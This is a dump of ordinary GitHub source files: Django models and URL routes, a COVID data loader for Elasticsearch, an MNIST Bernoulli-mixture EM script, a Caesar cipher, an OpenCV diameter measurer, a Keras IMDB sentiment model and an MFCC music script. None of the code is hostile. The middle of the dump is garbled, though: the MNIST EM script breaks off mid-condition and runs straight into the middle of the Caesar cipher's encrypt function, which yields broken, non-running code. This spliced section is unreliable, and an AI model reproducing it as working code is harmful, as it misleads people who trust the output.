null=True)\n branch = models.CharField(max_length=1024, default=\"UNSPECIFIED\")\n programme = models.CharField(blank=True, null=True, max_length=1024)\n\n current_cgpa = models.FloatField(blank=True, null=True)\n cgpa_1st_semester = models.FloatField(blank=True, null=True)\n cgpa_2nd_semester = models.FloatField(blank=True, null=True)\n cgpa_3rd_semester = models.FloatField(blank=True, null=True)\n sgpa_5th_semester = models.FloatField(blank=True, null=True)\n sgpa_6th_semester = models.FloatField(blank=True, null=True)\n agpa = models.FloatField(blank=True, null=True)\n marks = models.FloatField(blank=True, null=True)\n jee_rank = models.FloatField(blank=True, null=True)\n pcme_percentage = models.FloatField(blank=True, null=True)\n pcb_percentage = models.FloatField(blank=True, null=True)\n ti_rank = models.FloatField(blank=True, null=True)\n tu_rank = models.FloatField(blank=True, null=True)\n 
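# The nullable metric fields above exist because different scholarships are awarded on different criteria, so only the relevant columns are filled per record. A hedged usage sketch (variable names assumed, not part of this model): the total amount one student has received across sessions could be aggregated as\n    #\n    #   from django.db.models import Sum\n    #   total = ReceivedScholarship.objects.filter(student=some_student).aggregate(Sum('amount'))\n    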
twelfth_overall_percentage = models.FloatField(blank=True, null=True)\n\n amount = models.PositiveIntegerField()\n\n def __str__(self):\n return self.scholarship.name + f\" [{self.session.name}]\"\n\n\nclass CertificateRequest(models.Model):\n received_scholarship = models.OneToOneField(ReceivedScholarship, on_delete=models.CASCADE)\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n date_requested = models.DateTimeField(auto_now=True, editable=False)\n approved = models.BooleanField(default=False)\n date_approved = models.DateTimeField(blank=False, null=True)\n year_of_passing = models.CharField(max_length=1024, blank=False, null=True)\n passing_cgpa = models.CharField(max_length=1024, blank=False, null=True)\n certificate = models.FileField(blank=True, null=True)\n\n def __str__(self):\n return self.received_scholarship.scholarship.name + \": \" + self.received_scholarship.session.name\n\n def save(self, *args, **kwargs):\n if self.approved:\n rendered_certificate = render_to_string(\"pdfs/scholarship_certificate.html\", {\n 'date': self.date_approved.date(),\n 'image_path': finders.find('signature.png'),\n 'ref_no': self.id,\n 'name': self.student.student_name or self.student.user.get_full_name(),\n 'roll_no': self.student.roll_no,\n 'father_name': self.student.father_name,\n 'programme_name': self.student.program_name,\n 'branch': self.student.branch_desc,\n 'passing': self.year_of_passing,\n 'cgpa': self.passing_cgpa,\n 'scholarship': self.received_scholarship.scholarship.name,\n 'amount': self.received_scholarship.amount,\n 'session': self.received_scholarship.session.name\n })\n\n options = {\n 'page-size': 'Letter',\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n 'encoding': \"UTF-8\",\n 'custom-header': [\n ('Accept-Encoding', 'gzip')\n ],\n 'no-outline': None\n }\n certificate_name = f\"scholarship_certificate_{uuid4()}.pdf\"\n pdfkit.from_string(rendered_certificate,\n settings.MEDIA_ROOT / certificate_name,\n options=options)\n self.certificate.name = certificate_name\n\n super(CertificateRequest, self).save(*args, **kwargs)\n\n\nclass ExcelError:\n\n def __init__(self, row_id, error_msg):\n self.row_id = row_id\n self.error_msg = error_msg\n","repo_name":"MagnumDingusEdu/capstone","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71844702829","text":"from datetime import datetime\nimport csv\nimport requests\nfrom elasticsearch import Elasticsearch\n\n\ndef formatCCAA(ccaa):\n if ccaa == \"C. 
Valenciana\":\n ccaa = \"Comunidad Valenciana\"\n elif ccaa == \"Madrid\":\n ccaa = \"Comunidad de Madrid\"\n elif ccaa == \"Murcia\":\n ccaa = \"Región de Murcia\"\n elif ccaa == \"Baleares\":\n ccaa = \"Islas Baleares\"\n\n return ccaa\n\n\n# Spain urls\nurl_altas_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_altas.csv\"\nurl_casos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_casos.csv\"\nurl_fallecidos_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_fallecidos.csv\"\nurl_uci_spain = \"https://raw.githubusercontent.com/datadista/datasets/master/COVID%2019/ccaa_covid19_uci.csv\"\n\n\n# CCAA\nurl_ccaa_cyl = \"https://datosabiertos.jcyl.es/web/jcyl/risp/es/sector-publico/situacion-epidemiologica-coronavirus/1284940407131.csv\"\n\n\ndef save_elasticsearch_es(index, result_data):\n\n es = Elasticsearch()\n\n es.indices.create(\n index=index,\n ignore=400 # ignore 400 already exists code\n )\n print(result_data)\n\n id_case = str(result_data['date'].timestamp()) + \\\n '-'+result_data['CCAA']+'-'+result_data['type']\n es.index(index=index, id=id_case, body=result_data)\n\n\ndef get_data_csv_spain(base_url, index, case_type):\n '''\n :param base_url:\n :param index:\n :param type:\n\n '''\n\n with requests.get(base_url, stream=True) as r:\n lines = (line.decode('utf-8') for line in r.iter_lines())\n datasheets = list(csv.reader(lines))\n\n # Removing last lien with the Total\n del datasheets[-1]\n\n dateframe = datasheets[0][2:]\n for row in datasheets[1:]:\n ccaa = formatCCAA(row[1])\n\n result_data = {\n 'CCAA': ccaa,\n 'country': 'Spain',\n }\n\n previousData = 0\n infection_day_100 = 0\n\n for day, data in zip(dateframe, row[2:]):\n dataAux = int(data)\n data = int(data) - previousData\n previousData = dataAux\n\n if dataAux >= 100:\n infection_day_100 += 1\n\n result_data.update(\n date=datetime.strptime(day, \"%Y-%m-%d\"),\n type=case_type,\n count_case=int(data),\n total_case=dataAux,\n rate_100_infection=infection_day_100\n )\n save_elasticsearch_es(index, result_data)\n\n\nif __name__ == '__main__':\n\n # COVID Spain\n index_name = 'covid_spain'\n get_data_csv_spain(url_altas_spain, index_name, 'recuperado')\n get_data_csv_spain(url_casos_spain, index_name, 'confirmado')\n get_data_csv_spain(url_fallecidos_spain, index_name, 'fallecido')\n get_data_csv_spain(url_uci_spain, index_name, 'uci')\n","repo_name":"david-morenomoreno/COVID19","sub_path":"covidSpain.py","file_name":"covidSpain.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1103000429","text":"\"\"\"app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom drf_spectacular.views import (\n    SpectacularAPIView,\n    SpectacularSwaggerView,\n)\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import (\n    TokenObtainPairView,\n    TokenRefreshView,\n    TokenVerifyView,\n)\n\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('api/schema/', SpectacularAPIView.as_view(), name='api-schema'),\n    path('api/docs/',\n         SpectacularSwaggerView.as_view(url_name='api-schema'),\n         name='api-docs'),\n    path('api/user/', include('user.urls')),\n    path('api/forest/', include('forest.urls')),\n    path('api/species/', include('species.urls')),\n    path('api/reference/', include('reference.urls')),\n    path('api/register/', include('register.urls')),\n    path('api/register_picture/', include('register_picture.urls')),\n    path('api/login/',\n         TokenObtainPairView.as_view(),\n         name='token_obtain_pair'),\n    path('api/login/refresh/',\n         TokenRefreshView.as_view(),\n         name='token_refresh'),\n    path('api/login/verify/',\n         TokenVerifyView.as_view(),\n         name='token_verify'),\n]\n","repo_name":"taniagmangolini/suceco-api","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34030774035","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.datasets import fetch_openml\n\nmnist = fetch_openml(\"mnist_784\")\nmnist.data.shape\n'''\nMNIST data is in grayscale [0, 255].\nConvert it to a binary scale using a threshold of 128.\n'''\nmnist3 = (mnist.data/128).astype('int')\ndef pixel_convert(x):\n    count = 0\n    while x > 8 :\n        count+=1\n        x=x-8\n    return count\n\ndef load_image_data(image_file):\n    image = []\n    image_for_discrete = []\n    magic_number = image_file.read(4)\n    magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big': leftmost byte is most significant (big-endian)\n    images_number = image_file.read(4)\n    images_number = int.from_bytes(images_number, byteorder='big') # byteorder='big': leftmost byte is most significant (big-endian)\n    rows_number = image_file.read(4)\n    rows_number = int.from_bytes(rows_number, byteorder='big') # byteorder='big': leftmost byte is most significant (big-endian)\n    columns_number = image_file.read(4)\n    columns_number = int.from_bytes(columns_number, byteorder='big') # byteorder='big': leftmost byte is most significant (big-endian)\n    for i in range(images_number):\n        temp_image = []\n        temp_image_for_discrete = []\n        for j in range(rows_number*columns_number):\n            data = image_file.read(1)\n            data = int.from_bytes(data, byteorder='big')\n            data_for_discrete = convert_pixel(data)\n            temp_image.append(data)\n            temp_image_for_discrete.append(data_for_discrete)\n        image.append(temp_image)\n        image_for_discrete.append(temp_image_for_discrete)\n    #print(image)  \n    return image ,image_for_discrete\n\ndef load_label_data(label_file):\n    label = []\n    magic_number = label_file.read(4)\n    magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big': leftmost byte is most significant (big-endian)\n    items_number = label_file.read(4)\n    items_number = int.from_bytes(items_number, byteorder='big') # byteorder='big': leftmost byte is most significant (big-endian)\n    \n    for i in range(items_number):\n        data = label_file.read(1)\n        data = int.from_bytes(data, byteorder='big')\n        label.append(data)\n    return label  \n\n\ndef print_test_image(image_list,label_list):\n    data=open(\"output_image.txt\",'w+')\n    data.write(\"Imagination of numbers in Bayesian classifier:\\n\")\n    for i in range(len(image_list)):\n        data.write(str(label_list[i])+\":\\n\")\n        
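# The loaders above parse the IDX format by hand: each header field is a 4-byte big-endian unsigned integer (hence byteorder='big'), followed by one unsigned byte per pixel or label. A hedged equivalent sketch using the standard struct module (file name assumed; this script does not use struct):\n        #\n        #   import struct\n        #   with open('train-images-idx3-ubyte', 'rb') as f:\n        #       magic, n_images, n_rows, n_cols = struct.unpack('>IIII', f.read(16))\n        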
for j in range(28):\n for k in range(28):\n if image_list[i][k+28*j]<8:\n data.write(\"0\")\n else:\n data.write(\"1\") \n data.write(\"\\n\")\n data.write(\"\\n\")\n data.write(\"\\n\")\n return 0\n\ndef convert_pixel(x):\n if x > 127:\n return 1\n else:\n return 0\ndef show(image):\n '''\n Function to plot the MNIST data\n '''\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n imgplot = ax.imshow(image, cmap=plt.cm.Greys)\n imgplot.set_interpolation('nearest')\n ax.xaxis.set_ticks_position('top')\n ax.yaxis.set_ticks_position('left')\n plt.show()\n\ndef bernoulli(data, means):\n '''To compute the probability of x for each bernouli distribution\n data = N X D matrix\n means = K X D matrix\n prob (result) = N X K matrix \n '''\n N = len(data)\n K = len(means)\n #compute prob(x/mean)\n # prob[i, k] for ith data point, and kth cluster/mixture distribution\n prob = np.zeros((N, K))\n \n for i in range(N):\n for k in range(K):\n prob[i,k] = np.prod((means[k]**data[i])*((1-means[k])**(1-data[i])))\n \n return prob\n\ndef respBernoulli(data, weights, means):\n '''To compute responsibilities, or posterior probability p(z/x)\n data = N X D matrix\n weights = K dimensional vector\n means = K X D matrix\n prob or resp (result) = N X K matrix \n '''\n #step 1\n # calculate the p(x/means)\n prob = bernoulli(data, means)\n \n #step 2\n # calculate the numerator of the resp.s\n prob = prob*weights\n \n #step 3\n # calcualte the denominator of the resp.s\n row_sums = prob.sum(axis=1)[:, np.newaxis]\n \n # step 4\n # calculate the resp.s\n try:\n prob = prob/row_sums\n return prob\n except ZeroDivisionError:\n print(\"Division by zero occured in reponsibility calculations!\")\n \n \n\ndef bernoulliMStep(data, resp):\n '''Re-estimate the parameters using the current responsibilities\n data = N X D matrix\n resp = N X K matrix\n return revised weights (K vector) and means (K X D matrix)\n '''\n N = len(data)\n D = len(data[0])\n K = len(resp[0])\n \n Nk = np.sum(resp, axis=0)\n mus = np.empty((K,D))\n \n for k in range(K):\n mus[k] = np.sum(resp[:,k][:,np.newaxis]*data,axis=0) #sum is over N data points\n try:\n mus[k] = mus[k]/Nk[k] \n except ZeroDivisionError:\n print(\"Division by zero occured in Mixture of Bernoulli Dist M-Step!\")\n break \n \n return (Nk/N, mus)\n\ndef llBernoulli(data, weights, means):\n '''To compute expectation of the loglikelihood of Mixture of Beroullie distributions\n Since computing E(LL) requires computing responsibilities, this function does a double-duty\n to return responsibilities too\n '''\n N = len(data)\n K = len(means)\n \n resp = respBernoulli(data, weights, means)\n \n ll = 0\n for i in range(N):\n sumK = 0\n for k in range(K):\n try:\n temp1 = ((means[k]**data[i])*((1-means[k])**(1-data[i])))\n temp1 = np.log(temp1.clip(min=1e-50))\n \n except:\n print(\"Problem computing log(probability)\")\n sumK += resp[i, k]*(np.log(weights[k])+np.sum(temp1))\n ll += sumK\n \n return (ll, resp)\n\ndef mixOfBernoulliEM(data, init_weights, init_means, maxiters=1000, relgap=1e-4, verbose=False):\n '''EM algo fo Mixture of Bernoulli Distributions'''\n N = len(data)\n D = len(data[0])\n K = len(init_means)\n \n #initalize\n weights = init_weights[:]\n means = init_means[:]\n ll, resp = llBernoulli(data, weights, means)\n ll_old = ll\n \n for i in range(maxiters):\n if verbose and (i % 5 ==0):\n print(\"iteration {}:\".format(i))\n print(\" {}:\".format(weights))\n print(\" {:.6}\".format(ll))\n \n #E Step: calculate resps\n #Skip, rolled into log likelihood calc\n #For 0th step, 
done as part of initialization\n \n #M Step\n weights, means = bernoulliMStep(data, resp)\n \n #convergence check\n ll, resp = llBernoulli(data, weights, means)\n if np.abs(ll-ll_old) ord(\"z\"):\n encrypted += chr(ord(letter) + step - len(string.ascii_lowercase)).upper()\n else:\n encrypted += chr(ord(letter) + step).upper()\n encrypted_words.append(encrypted)\n \n return \" \".join(encrypted_words)\n\n\n# decrypt a message using a Caesars cipher \ndef caesars_decrypt(to_decrypt = str, \n step = int):\n \n \"\"\"\n Decrypts a message that was originally encrypted using Caesars cipher\n The steps can again be inputted in the function\n \"\"\"\n \n word_list = list(to_decrypt.split(\" \"))\n decrypted_words = []\n \n for word in word_list:\n decrypted = \"\"\n for letter in word:\n if letter not in string.ascii_uppercase:\n continue\n letter = letter.lower()\n if (ord(letter) - step) < ord(\"a\"):\n decrypted += chr(ord(letter) - step + len(string.ascii_lowercase))\n else:\n decrypted += chr(ord(letter) - step)\n decrypted_words.append(decrypted)\n \n return \" \".join(decrypted_words)\n \n\ndef break_caesar(message = str, \n most_frequent = \"e\"):\n \n \"\"\"\n Attempts to decode an encode message based on frequency analysis\n This function relies on the hypothesis that the letter 'e' is the most\n commonly used letter in strings\n \"\"\"\n \n highest_proportion = -1\n frequent_letter = \"\"\n \n # get the most frequent letter\n for letter in set(message):\n if message.count(letter) > highest_proportion:\n highest_proportion = message.count(letter)\n frequent_letter = letter\n \n # assume that this letter represents an \"e\"\n step = ord(frequent_letter.lower()) - ord(\"e\")\n \n return caesars_decrypt(to_decrypt = message, \n step = step)\n \n\n#%%\n \n# the string we start from\ntext = \"lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod tempor incididunt ut labore et dolore magna aliqua semper viverra nam libero justo laoreet sit amet cursus nibh ipsum consequat nisl vel pretium lectus condimentum id venenatis a condimentum vitae sapien elit eget gravida cum sociis natoque penatibus et in hendrerit gravida rutrum quisque pulvinar etiam non quam lacus aliquam faucibus purus in massa tempor nec feugiat nisl pretium blandit volutpat maecenas volutpat blandit aliquam etiam erat velit scelerisque in dictum non consectetur a sagittis orci a scelerisque purus semper at urna condimentum mattis pellentesque id nibh vitae purus faucibus ornare suspendisse libero justo laoreet sit amet cursus sit\"\n\nprint(\"\\n- - - -\\nOriginal message\\n- - - -\\n\")\nprint(text)\n\n# an example of the encryption process\nencrypted = caesars_encrypt(to_encrypt = text,\n step = 3)\nprint(\"\\n- - - -\\nEncrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(encrypted)\n\n# an example of the decryption process\ndecrypted = caesars_decrypt(to_decrypt = encrypted, \n step = 3)\nprint(\"\\n- - - -\\nDecrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(decrypted)\n\n# show the code breaker\ndeciphered = break_caesar(message = encrypted.replace(\" \", \"\"))\nprint(\"\\n- - - -\\nDecrypted message using frequency analysis\\n- - - -\\n\")\nprint(deciphered)","repo_name":"shaista1519/Practice-of-computing-using-Python","sub_path":"Part 3/Chapter 07/Programming projects/project_04.py","file_name":"project_04.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"207130899","text":"# 
https://www.acmicpc.net/problem/5430\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\nt = int(input())\n\nfor _ in range(t):\n    p = input().strip()\n    n = int(input())\n    arr = input().strip()\n    if len(arr) == 2: # empty array given as input\n        arr = []\n    else:\n        arr = arr[1:-1].split(',')\n    deq = deque(arr)\n    \n    rvs = False\n    err = False\n    \n    for cmd in p:\n        if cmd == 'R': # reverse the order of the array\n            rvs = not rvs\n        elif cmd == 'D': # discard the first number\n            if not deq:\n                err = True\n                break\n            if rvs:\n                deq.pop()\n            else:\n                deq.popleft()\n    \n    if err:\n        print(\"error\")\n        continue\n    if rvs:\n        deq.reverse()\n    print(\"[\" + \",\".join(deq) + \"]\")","repo_name":"zero0205/Algorithm_Python","sub_path":"solved_class3/5430_AC.py","file_name":"5430_AC.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15731535153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 09:39:43 2017\n\n@author: mkeranen\n\nDiameter measurement work - need to optimize binarize, segment out main diameter\nCurrently finds the largest contour in range and fits a circle to it.\n\"\"\"\n\n# import the necessary packages\nfrom scipy.spatial import distance as dist\nfrom imutils import perspective\nfrom imutils import contours\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\ndef midpoint(ptA, ptB):\n\treturn ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)\n\n# load the image to process\nimage = cv2.imread('circles.png')\n\n#Resize img to fit computer screen better\nimage = cv2.resize(image, (int(image.shape[1]/4), int(image.shape[0]/4)))\n\n#Process image --> grayscale --> binarize --> Gaussian Blur\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nbinarized = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\ngrayblur = cv2.GaussianBlur(binarized[1], (7, 7), 0)\n\n##Uncomment to display previous 3 operations\n#cv2.imshow(\"Original Image\", image)\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Converted to Grayscale\", gray)\n#cv2.waitKey(0)\n#\n\n#cv2.imshow(\"Binarized\", binarized[1])\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Gaussian Blur\", grayblur)\n#cv2.waitKey(0)\n\n\n\n\nedgedCanny2 = cv2.Canny(grayblur, 50, 100)\n\nedgedDilate = cv2.dilate(edgedCanny2, None, iterations=1)\nedgedErode = cv2.erode(edgedDilate, None, iterations=1)\nimg = edgedCanny2.copy()\n#Show image operations\n#cv2.imshow(\"Canny Edge Detection - blur\", edgedCanny2)\n#cv2.waitKey(0)\n\n\n#Convert latest image back to color to allow colored contour lines\nimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n#Find contours on grayscale image\ncnts = cv2.findContours(edgedCanny2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\ncnts = cnts[1]\nnewCnts = []\ncircleList = []\n\n#Process contours by arc length and circle size\nfor c in cnts:\n    circle = cv2.minEnclosingCircle(c)\n    if cv2.arcLength(c,1)>100 and circle[1]>100:\n        newCnts.append(c)\n        circleList.append(circle)\n\n#Find max radius of circle enclosing the contours\nmaxRadius = 0\nfor radius in circleList:\n    if radius[1] > maxRadius:\n        maxRadius = radius[1]\n        maxCenter = radius[0]\n\n#Draw the max bounding circle\nimg = cv2.circle(img.copy(), (int(maxCenter[0]),int(maxCenter[1])), int(maxRadius), (0,0,255), 3)\n#Draw contours on color image\nimg = cv2.drawContours(img.copy(), newCnts, -1, (0,255,0), 1)\n#Show contours\ncv2.imshow(\"Contour 
Plot\",img)\ncv2.waitKey(0)\n","repo_name":"mkeranen/CV_Diameter_Measurement","sub_path":"dia_msmt_mk.py","file_name":"dia_msmt_mk.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44678310424","text":"import graphics\nimport math\n\nwin = graphics.GraphWin(\"Graphics Window\", 500, 500)\n\npt0 = graphics.Point(275, 250)\npt30 = graphics.Point(250 + 40 * math.cos(math.pi/6), 250 - 40 * math.sin(math.pi/6))\npt60 = graphics.Point(250 + 60 * math.cos(math.pi/3), 250 - 60 * math.sin(math.pi/3))\npt90 = graphics.Point(250, 200)\npt120 = graphics.Point(250 - (30 * math.cos(math.pi/3)), 250 - (30 * math.sin(math.pi/3)))\npt150 = graphics.Point(250, 250)\n\n\ncir = graphics.Circle(pt0, 5)\ncir2 = graphics.Circle(pt30, 5)\ncir3 = graphics.Circle(pt60, 5)\ncir4 = graphics.Circle(pt90, 5)\ncir5 = graphics.Circle(pt120, 5)\ncir6 = graphics.Circle(pt150, 5)\ncirEnc = graphics.Circle(graphics.Point(250, 250), 100)\n\nlineVert = graphics.Line(graphics.Point(250, 150), graphics.Point(250,350))\nlineHoriz = graphics.Line(graphics.Point(150, 250), graphics.Point(350, 250))\nline30 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 + 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 - (100 * math.sin(math.pi/6))))\nline60 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 + 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 - (100 * math.sin(math.pi/3))))\nline120 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 - 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 + (100 * math.sin(math.pi/3))))\nline150 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 - 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 + (100 * math.sin(math.pi/6))))\n\ncirEnc.draw(win)\ncir.draw(win)\ncir2.draw(win)\ncir3.draw(win)\ncir4.draw(win)\ncir5.draw(win)\ncir6.draw(win)\n\nlineVert.draw(win)\nlineHoriz.draw(win)\nline30.draw(win)\nline60.draw(win)\nline120.draw(win)\nline150.draw(win)\n\ndx = 0.1\ndy = -0.1\ndxDiag = 0.1 * math.sqrt(2) / 2\ndyDiag = 0.1 * math.sqrt(2) / 2\n\nwin.getMouse()\n\nwhile True:\n if cir.getCenter().getX() >= 350:\n dx = -0.1\n dy = 0.1\n dxDiag = 0.1 * math.sqrt(2) / 2\n dyDiag = 0.1 * math.sqrt(2) / 2\n if cir.getCenter().getX() <= 150:\n dx = -dx\n dy = -dy\n dxDiag = -dxDiag\n dyDiag = -dyDiag\n\n cir.move(dx, 0)\n cir2.move(-dx, 0)\n cir3.move(0, dy)\n cir4.move(0, -dy)\n cir5.move(dxDiag, dyDiag)\n cir6.move(-dxDiag, dyDiag)\n\n\n","repo_name":"crosenblatt/Python-Gifs","sub_path":"Circles.py","file_name":"Circles.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25159912456","text":"import pandas as pd\n\nreviews = pd.read_csv(\"IMDB Dataset.csv\")\nreviews.head()\nreviews.shape\n# (50000, 2)\n\nimport re\nfrom sklearn.feature_extraction import text\n\nstop_words = text.ENGLISH_STOP_WORDS\n\ndef clean_review(review, stopwords):\n html_tag = re.compile('<.*?>')\n cleaned_review = re.sub(html_tag, \"\", review).split()\n cleaned_review = [i for i in cleaned_review if i not in stopwords]\n return \" \".join(cleaned_review)\n\n## before cleaning\ntext = reviews.review[0]\nprint(text[:200])\n# One of the other reviewers has mentioned that after watching just 1 Oz episode you'll 
be hooked. They are right, as this is exactly what happened with me.

The first thing that struck me abo\n\n## after cleaning\ncleaned_text = clean_review(text, stop_words)\nprint(cleaned_text[:200])\n# One reviewers mentioned watching just 1 Oz episode you'll hooked. They right, exactly happened me.The thing struck Oz brutality unflinching scenes violence, set right word GO. Trust me, faint hearted\n\n## cleaning the review column\nreviews[\"cleaned_review\"] = reviews[\"review\"].apply(lambda x: clean_review(x, stop_words))\n\nfrom keras.preprocessing.text import Tokenizer\n\n## maximum words to keep based on frequency \nmax_features = 5000\n## replace out-of-vocab words with this\noov = \"OOV\"\ntokenizer = Tokenizer(num_words = max_features, oov_token = oov)\ntokenizer.fit_on_texts(reviews[\"cleaned_review\"])\n## convert text into integers\ntokenized = tokenizer.texts_to_sequences(reviews[\"cleaned_review\"])\n\nfrom sklearn.preprocessing import LabelEncoder\n\ndef sentiment_encode(df, column, le):\n le.fit(df[column])\n sentiment_le = le.transform(df[column])\n return sentiment_le, le\n\nle = LabelEncoder()\nsentiment_le, le = sentiment_encode(reviews, \"sentiment\", le)\nprint(len(le.classes_))\n# 2\nle.classes_\n# array(['negative', 'positive'], dtype=object)\n\nfrom keras.preprocessing import sequence\n\nmax_len = 500\nXtrain = sequence.pad_sequences(tokenized, maxlen = max_len)\n\nfrom sklearn.model_selection import train_test_split\n\n## we will do the splitting using a random state to ensure same splitting every time\nX_train, X_test, y_train, y_test = train_test_split(Xtrain, sentiment_le, \n test_size = .5,\n random_state = 13)\n \n## importing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Bidirectional, Dropout\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D\n\n## model parameters\nvocab_size = max_features #5000\nembedding_dims = 128 # dimensions to which text will be represented\nnum_epochs = 3\nnoutput = len(le.classes_) #2 (binary)\n\n## model\nmodel = Sequential()\n# embedding layer (vocab_size is the total number of words in data,\n# then the embedding dimensions we specified, then the maximum length of one review)\nmodel.add(Embedding(vocab_size, embedding_dims, input_length = max_len))\n# CNN\nmodel.add(Conv1D(128, kernel_size = 4, input_shape = (vocab_size, embedding_dims),\n activation = \"relu\"))\n# max pooling layer\nmodel.add(MaxPooling1D(pool_size = 3))\n# bidirectional LSTM\nmodel.add(Bidirectional(LSTM(64, return_sequences = True)))\n# LSTM and droput\nmodel.add(LSTM(32, recurrent_dropout = 0.4))\nmodel.add(Dropout(0.2))\n# 1 neuron output layer and sigmoid activation (binary 0 or 1)\nmodel.add(Dense(noutput - 1, activation = \"sigmoid\"))\n# model summary and layout\nmodel.summary()\n\n# adam optimizer and binary crossentropy\nmodel.compile(loss = \"binary_crossentropy\", metrics = [\"accuracy\"],\n optimizer = \"adam\")\n\nmodel.fit(X_train, y_train, epochs = num_epochs,\n batch_size = 32,\n validation_data = (X_test[:1000], y_test[:1000]),\n verbose = 1)\n\nresults = model.evaluate(X_test[1000:], y_test[1000:])\n# 750/750 [==============================] - 51s 65ms/step - loss: 0.3550 - accuracy: 0.8637\nprint(\"test loss: %.2f\" % results[0])\n# test loss: 0.36\nprint(\"test accuracy: %.2f%%\" % (results[1] * 100))\n# test accuracy: 
86.37%","repo_name":"MNoorFawi/sentiment-prediction-using-cnn-and-lstm-in-keras","sub_path":"full_code.py","file_name":"full_code.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"73443813872","text":"# Load the librosa library, used for MFCC\nimport librosa \nimport librosa.feature # librosa.feature provides the MFCC feature extractor\nimport librosa.display # pull in the display functions from librosa\nimport glob # glob is a Python module commonly used to collect files of any format, music included\nimport numpy as np # import numpy as np, used for the audio arrays\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.utils.np_utils import to_categorical\n\ndef display_mfcc(song): # function taking a song path as input\n    y, _ = librosa.load(song) # y holds the audio loaded from song\n    mfcc = librosa.feature.mfcc(y) # the MFCC feature converts the audio into vector form\n\n    plt.figure(figsize=(10, 4))\n    librosa.display.specshow(mfcc, x_axis='time', y_axis='mel')\n    plt.colorbar()\n    plt.title(song)\n    plt.tight_layout()\n    plt.show()\n\ndisplay_mfcc('lagu/viavallen/viavallen_wegahelangan.mp3') # call display_mfcc to plot the target audio file\n\ndisplay_mfcc('lagu/tulus/tulus_adurayu.mp3')\n\ndef extract_features_song(f):\n    y, _ = librosa.load(f)\n    # get Mel-frequency cepstral coefficients\n    mfcc = librosa.feature.mfcc(y)\n    # normalize values between -1,1 (divide by max)\n    mfcc /= np.amax(np.absolute(mfcc))\n    return np.ndarray.flatten(mfcc)[25000:]\n\nextract_features_song('lagu/tulus/tulus_adurayu.mp3')\n\nextract_features_song('lagu/viavallen/viavallen_wegahelangan.mp3')\n\ndef generate_features_and_labels():\n    all_features = [] # all_features starts as an empty list\n    all_labels = [] # all_labels starts as an empty list\n\n    lagu = ['viavallen', 'tulus', 